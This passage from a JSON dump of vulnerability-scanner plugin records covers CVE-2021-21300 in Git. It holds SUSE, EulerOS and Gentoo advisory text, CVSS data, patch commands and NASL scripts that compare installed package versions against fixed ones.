reference:\"git-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-debugsource-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-email-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-gui-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-svn-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-svn-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-web-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"gitk-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-arch-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-core-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-core-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-cvs-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-daemon-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-daemon-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-debugsource-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-email-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-gui-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-svn-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-svn-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"git-web-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"gitk-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-arch-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-core-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-core-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-cvs-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-daemon-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-daemon-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-debugsource-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-email-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-gui-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-svn-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-svn-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"git-web-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"gitk-2.26.2-3.31.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:27", "description": "This update for git fixes the following issues :\n\nOn case-insensitive filesystems, with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS), Git could be fooled into running remote code during a clone. (bsc#1183026, CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2021:0756-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-daemon-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2021-0756-1.NASL", "href": "https://www.tenable.com/plugins/nessus/147436", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0756-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147436);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2021:0756-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\nOn case-insensitive filesystems, with support for symbolic links, if\nGit is configured globally to apply delay-capable clean/smudge filters\n(such as Git LFS), Git could be fooled into running remote code during\na clone. (bsc#1183026, CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1183026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-21300/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210756-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?94a6263b\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-756=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-756=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2021-756=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2021-756=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2021-756=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2021-756=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-756=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-756=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2021-756=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-756=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-756=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-756=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-756=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2021-756=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-756=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2021-756=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-core-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-core-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-cvs-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-daemon-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-daemon-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-debugsource-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-email-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-gui-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-svn-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-web-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"gitk-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-cvs-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-daemon-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-daemon-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-debugsource-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-email-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-gui-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-svn-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-web-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"gitk-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-cvs-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-daemon-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-daemon-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-debugsource-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-email-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-gui-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-svn-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-web-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"gitk-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-core-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-core-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-cvs-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-daemon-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-daemon-debuginfo-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-debugsource-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-email-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-gui-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-svn-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-web-2.26.2-27.43.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"gitk-2.26.2-27.43.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:50:12", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources.\n The earliest impacted version is 2.14.2.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : git (EulerOS-SA-2021-1944)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:git-help", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1944.NASL", "href": "https://www.tenable.com/plugins/nessus/150179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150179);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\n \"CVE-2021-21300\"\n );\n\n script_name(english:\"EulerOS 2.0 SP9 : git (EulerOS-SA-2021-1944)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Git is an open-source distributed revision control\n system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while\n cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on\n Windows and macOS). Note that clean/smudge filters have\n to be configured for that. Git for Windows configures\n Git LFS by default, and is therefore vulnerable. The\n problem has been patched in the versions published on\n Tuesday, March 9th, 2021. As a workaound, if symbolic\n link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack\n won't work. Likewise, if no clean/smudge filters such\n as Git LFS are configured globally (i.e. _before_\n cloning), the attack is foiled. As always, it is best\n to avoid cloning repositories from untrusted sources.\n The earliest impacted version is\n 2.14.2.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1944\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59f7f5d5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-help\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-2.23.0-12.h3.eulerosv2r9\",\n \"git-help-2.23.0-12.h3.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:16", "description": "The remote host is affected by the vulnerability described in GLSA-202104-01 (Git: User-assisted execution of arbitrary code)\n\n It was discovered that Git could be fooled into running remote code during a clone on case-insensitive file systems with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS).\n Impact :\n\n A remote attacker could entice a user to clone a specially crafted repository, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 